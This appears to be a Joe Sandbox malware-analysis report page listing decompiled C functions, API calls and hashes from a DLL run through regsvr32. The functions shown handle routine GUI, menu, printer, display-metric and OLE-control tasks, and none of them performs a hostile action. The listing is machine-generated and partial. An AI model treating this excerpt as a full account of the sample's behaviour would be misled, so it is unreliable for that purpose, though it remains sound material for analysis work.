Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad89c1ad2383fea64f5bbeb58d4f5704c501ff907167c4bf791acf07e99c9257
Instruction ID: 64355e8f9292b3fd31e2b969ec47c5052e073e656d727c24f8f41363996b1544
Opcode Fuzzy Hash: ad89c1ad2383fea64f5bbeb58d4f5704c501ff907167c4bf791acf07e99c9257
Instruction Fuzzy Hash: 44312771A0420EAFDF05CFA4CD849EEBBFCEF48284B104522F921E6414E770DA819BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003836D Relevance: 12.1, APIs: 8, Instructions: 85
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E1003836D(void* __eflags) {
				intOrPtr _v4;
				struct HWND__* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t30;
				struct HWND__* _t33;
				intOrPtr _t36;
				intOrPtr _t40;
				int _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t52;
				signed int _t54;
				void* _t62;
				void* _t64;
				signed int _t67;
				void* _t74;

				_t74 = __eflags;
				_t67 = _t54;
				_push(_t62);
				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c));
				_t52 = 0;
				E10049170(_t62,  &(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x74)) + 0x20)) - _t30 + 1);
				_t33 = GetFocus();
				_t63 =  *((intOrPtr*)(_t67 + 0x74));
				_t58 = _t67;
				_v8 = _t33;
				 *( *((intOrPtr*)(_t67 + 0x74)) + 4) = E1001B932(0, _t67, _t74);
				E10014092(0,  *((intOrPtr*)(_t67 + 0x74)), _t74);
				_t36 =  *((intOrPtr*)(_t67 + 0x74));
				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
					_t52 = 1;
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 0);
				}
				_t64 = E1001DD4F(_t52, _t63, _t67, 1);
				if(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x34) & 0x00080000) == 0) {
					E1001628E(_t64, __eflags, _t67);
				} else {
					 *(_t64 + 0x18) = _t67;
				}
				_push( *((intOrPtr*)(_t67 + 0x74)));
				if( *((intOrPtr*)(_t67 + 0x78)) == 0) {
					_t40 = E10038356(_t58);
				} else {
					_t40 = E1003833F(_t58);
				}
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				_v4 = _t40;
				if(_t52 != 0) {
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 1);
				}
				_t41 = IsWindow(_v8);
				_t81 = _t41;
				if(_t41 != 0) {
					SetFocus(_v8);
				}
				E1001B96C(_t52, _t67, _t64, _t67, _t81);
				_t43 = _v4;
				if(_t43 == 0) {
					_t44 = 2;
					return _t44;
				}
				return _t43;
			}

0x1003836d
0x10038372
0x10038377
0x1003837b
0x1003838e
0x10038394
0x1003839c
0x100383a2
0x100383a5
0x100383a7
0x100383b0
0x100383b3
0x100383b8
0x100383c4
0x100383db
0x100383dc
0x100383dc
0x100383e3
0x100383ef
0x100383f7
0x100383f1
0x100383f1
0x100383f1
0x10038400
0x10038403
0x1003840c
0x10038405
0x10038405
0x10038405
0x10038411
0x10038417
0x1003841b
0x10038425
0x10038425
0x1003842b
0x10038431
0x10038433
0x10038439
0x10038439
0x10038441
0x10038446
0x10038450
0x10038454
0x00000000
0x10038454
0x10038457

APIs

lstrlenA.KERNEL32(?,?,?,?,?,?,?,100290F5,00000104,00000000,*.*,00000000,0000F002,00000000,00000000,00000000), ref: 1003837B
_memset.LIBCMT ref: 10038394
GetFocus.USER32 ref: 1003839C
IsWindowEnabled.USER32(?), ref: 100383C9
EnableWindow.USER32(?,00000000), ref: 100383DC
EnableWindow.USER32(?,00000001), ref: 10038425
IsWindow.USER32(?), ref: 1003842B
SetFocus.USER32 ref: 10038439

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$EnableFocus$Enabled_memsetlstrlen
String ID:
API String ID: 2950697994-0
Opcode ID: f0f1da95206798f49824e7f2f6db60fdbb87c900ded1039eee4aa50a4a0a7f24
Instruction ID: 6f38c0740e7c62932b7d44983408263edad7e6d49eecc0aa883ddb142f7e42be
Opcode Fuzzy Hash: f0f1da95206798f49824e7f2f6db60fdbb87c900ded1039eee4aa50a4a0a7f24
Instruction Fuzzy Hash: DE21AD34240B019FE712DF70CE89A2ABBE5FF44B41F1189ADFA428B661DB71E911CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000A30D Relevance: 12.1, APIs: 8, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A30D(struct HMENU__* _a4, struct HMENU__* _a8, signed int _a12) {
				int _v4;
				int _v8;
				int _t16;
				int _t17;
				int _t19;
				int _t21;
				struct HMENU__* _t24;

				_v8 = GetMenuItemCount(_a8);
				_t16 = GetMenuItemCount(_a4);
				_t19 = _t16 - 1;
				if(_t19 >= 0) {
					do {
						_t17 = GetSubMenu(_a4, _t19);
						_t24 = _t17;
						_t21 = 0;
						if(_t24 == 0) {
							goto L14;
						}
						if(_a12 == 0) {
							if(_v8 <= 0) {
								goto L14;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_t17 = GetSubMenu(_a8, _t21);
								if(_t17 == _t24) {
									break;
								}
								_t21 = _t21 + 1;
								if(_t21 < _v8) {
									continue;
								}
								goto L14;
							}
							_t17 = RemoveMenu(_a4, _t19, 0x400);
							goto L14;
						}
						_t17 = GetMenuItemCount(_t24);
						_v4 = _t17;
						if(_t17 <= 0) {
							goto L14;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							_t17 = GetSubMenu(_t24, _t21);
							if(_t17 == _a12) {
								break;
							}
							_t21 = _t21 + 1;
							if(_t21 < _v4) {
								continue;
							}
							goto L14;
						}
						_t17 = RemoveMenu(_t24, _t21, 0x400);
						_a12 = _a12 & 0x00000000;
						L14:
						_t19 = _t19 - 1;
					} while (_t19 >= 0);
					return _t17;
				}
				return _t16;
			}

0x1000a321
0x1000a325
0x1000a329
0x1000a32a
0x1000a338
0x1000a33d
0x1000a33f
0x1000a341
0x1000a345
0x00000000
0x00000000
0x1000a34b
0x1000a387
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a389
0x1000a389
0x1000a38e
0x1000a392
0x00000000
0x00000000
0x1000a394
0x1000a399
0x00000000
0x00000000
0x00000000
0x1000a39b
0x1000a3a7
0x00000000
0x1000a3a7
0x1000a34e
0x1000a356
0x1000a35a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a35c
0x1000a35c
0x1000a35e
0x1000a364
0x00000000
0x00000000
0x1000a366
0x1000a36b
0x00000000
0x00000000
0x00000000
0x1000a36d
0x1000a376
0x1000a37c
0x1000a3ad
0x1000a3ad
0x1000a3ad
0x00000000
0x1000a3b1
0x1000a3b6

APIs

GetMenuItemCount.USER32(?), ref: 1000A31B
GetMenuItemCount.USER32(?), ref: 1000A325
GetSubMenu.USER32 ref: 1000A33D
GetMenuItemCount.USER32(00000000), ref: 1000A34E
GetSubMenu.USER32 ref: 1000A35E
RemoveMenu.USER32(00000000,00000000,00000400), ref: 1000A376
GetSubMenu.USER32 ref: 1000A38E
RemoveMenu.USER32(?,00000000,00000400), ref: 1000A3A7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Menu$CountItem$Remove
String ID:
API String ID: 3494307843-0
Opcode ID: 2fe3abc88c44e475f702ddc5be6247ceb21d7c66d41bd7c01b56f2452f2c36c7
Instruction ID: d18577bb6ad9008869b906b4cf11c4d394a577308c1e0308ffc8e2554ca28334
Opcode Fuzzy Hash: 2fe3abc88c44e475f702ddc5be6247ceb21d7c66d41bd7c01b56f2452f2c36c7
Instruction Fuzzy Hash: 78119A32109324ABF211DB11CD49E6FBBE8FFC2AC4F114B5AF585A2014D631AE919B67

Uniqueness

Uniqueness Score: -1.00%

Function 1001945B Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001945B(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10021AAD(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10021AAD( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x1001945e
0x10019460
0x10019462
0x1001946a
0x10019484
0x1001948c
0x10019496
0x1001949d
0x1001949f
0x100194a4
0x100194a7
0x100194a7
0x100194be
0x100194c5
0x100194dd
0x100194e2
0x100194e7
0x100194e7
0x100194ed
0x100194ed
0x1001949d
0x100194f2
0x100194f6

APIs

GlobalLock.KERNEL32 ref: 10019478
lstrcmpA.KERNEL32(?,?), ref: 10019484
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10019496
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100194B6
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100194BE
GlobalLock.KERNEL32 ref: 100194C8
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100194D5
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100194ED

Part of subcall function 10021AAD: GlobalFlags.KERNEL32(?), ref: 10021AB8
Part of subcall function 10021AAD: GlobalUnlock.KERNEL32(?,?,00000000,100194E7,?,00000000,?,?,00000000,00000000,00000002), ref: 10021ACA
Part of subcall function 10021AAD: GlobalFree.KERNEL32(?), ref: 10021AD5

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 6b1f87ba8bcf75dd71a5544a97f536b0397112a0b773925fa08fb88bca13e77b
Instruction ID: 2d086dcef950c7a74b8bae95a46a9c9ef594960c6ce8d9f37c1e1a3c87edc55f
Opcode Fuzzy Hash: 6b1f87ba8bcf75dd71a5544a97f536b0397112a0b773925fa08fb88bca13e77b
Instruction Fuzzy Hash: 57119A75900600BFDB12DBA9CC89CAF7BFEFF85B407008419FA42D6021DA3AE991D724

Uniqueness

Uniqueness Score: -1.00%

Function 100212D3 Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100212D3(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x100bdc78 = GetSystemMetrics(2) + 1;
				 *0x100bdc7c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x100212de
0x100212e4
0x100212eb
0x100212f3
0x100212fd
0x1002130e
0x10021318
0x10021320
0x1002132c

APIs

GetSystemMetrics.USER32 ref: 100212E0
GetSystemMetrics.USER32 ref: 100212E7
GetSystemMetrics.USER32 ref: 100212EE
GetSystemMetrics.USER32 ref: 100212F8
GetDC.USER32(00000000), ref: 10021302
GetDeviceCaps.GDI32(00000000,00000058), ref: 10021313
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002131B
ReleaseDC.USER32(00000000,00000000), ref: 10021323

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 78e7981010e9d5f3b6ad787d16835bfe9920a540278f1f62623a3b6c9706e8f2
Instruction ID: f7b543dd6023dbd25c52ffe13c507f1655c341cfc04319cd9b5f75389163816c
Opcode Fuzzy Hash: 78e7981010e9d5f3b6ad787d16835bfe9920a540278f1f62623a3b6c9706e8f2
Instruction Fuzzy Hash: 92F03675A40714AEF7206F718C89F677BA4EFC5751F01455AE6418B1D0DAB59801CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001D1D8 Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E1001D1D8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x100b9e70; // 0x6fb3f782
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1004764D(0x1008f20e, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				L1000140B(_t246 + 0x28, E100184C0());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E10009F14(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1002D3F6(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							L100011E5(_t246 + 0x28, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E100337E7(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E1002B024(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E1002B631( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							L1002C926( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							L10018A1F(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E10033B9C(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					L100013E3( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1004763E(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

0x1001d1dc
0x1001d1e0
0x1001d1e7
0x1001d1ea
0x1001d1f1
0x1001d1fd
0x1001d200
0x1001d203
0x1001d209
0x1001d20f
0x1001d212
0x1001d215
0x1001d218
0x1001d220
0x1001d226
0x1001d22d
0x1001d237
0x1001d23f
0x1001d247
0x1001d24a
0x1001d24e
0x1001d252
0x1001d255
0x1001d255
0x1001d258
0x1001d260
0x1001d26a
0x1001d279
0x1001d27c
0x1001d27f
0x1001d282
0x1001d288
0x1001d290
0x1001d292
0x1001d294
0x1001d298
0x1001d29d
0x1001d2a1
0x1001d2a7
0x1001d2a9
0x1001d2ab
0x1001d2ae
0x1001d2ae
0x1001d29d
0x1001d2b1
0x1001d2be
0x1001d2cb
0x1001d2ce
0x1001d2d1
0x1001d2d4
0x1001d2d7
0x1001d2e5
0x1001d2e7
0x1001d2e7
0x1001d2ea
0x1001d2ef
0x1001d2f2
0x1001d2f5
0x1001d37b
0x1001d37b
0x1001d37e
0x00000000
0x00000000
0x00000000
0x00000000
0x1001d2fb
0x1001d2fb
0x1001d2fb
0x1001d2fd
0x1001d301
0x1001d304
0x1001d308
0x1001d30e
0x1001d311
0x1001d348
0x1001d34e
0x1001d351
0x1001d353
0x1001d357
0x1001d369
0x1001d369
0x1001d359
0x1001d362
0x1001d362
0x1001d36b
0x1001d36f
0x1001d313
0x1001d315
0x1001d318
0x1001d31d
0x1001d324
0x1001d327
0x1001d32f
0x1001d334
0x1001d337
0x1001d33a
0x1001d341
0x1001d341
0x1001d372
0x1001d378
0x00000000
0x1001d385
0x1001d385
0x1001d385
0x1001d388
0x1001d38f
0x1001d390
0x1001d391
0x1001d39b
0x1001d393
0x1001d393
0x1001d393
0x1001d3a1
0x1001d3a3
0x1001d3a4
0x1001d3aa
0x1001d3ab
0x1001d3ae
0x1001d3c2
0x1001d3c6
0x1001d3c9
0x1001d3cb
0x1001d3cd
0x1001d3d0
0x1001d3d9
0x1001d3e2
0x1001d421
0x1001d435
0x1001d441
0x1001d454
0x1001d460
0x1001d46d
0x1001d479
0x1001d479
0x1001d3e2
0x1001d482
0x1001d487
0x1001d487
0x1001d48d
0x1001d492
0x1001d4da
0x1001d494
0x1001d49c
0x1001d49e
0x1001d49e
0x1001d4a2
0x1001d4a6
0x1001d4b1
0x1001d4bb
0x1001d4c3
0x1001d4c4
0x1001d4c5
0x1001d4d4
0x1001d4d4

APIs

__EH_prolog3.LIBCMT ref: 1001D1F1
MapDialogRect.USER32(?,00000000), ref: 1001D282
SysAllocStringLen.OLEAUT32(?,?), ref: 1001D2A1
CLSIDFromString.OLE32(?,?), ref: 1001D393

Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E

CLSIDFromProgID.OLE32(?,?), ref: 1001D39B
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 1001D435
SysFreeString.OLEAUT32(00000000), ref: 1001D487

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
